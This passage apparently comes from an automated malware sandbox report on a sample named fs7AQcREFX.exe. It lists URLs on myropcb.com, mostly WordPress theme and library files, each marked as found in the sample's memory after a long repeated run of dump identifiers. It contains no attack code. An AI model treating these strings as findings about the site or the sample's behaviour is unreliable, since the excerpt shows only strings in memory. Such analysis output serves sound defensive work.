00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
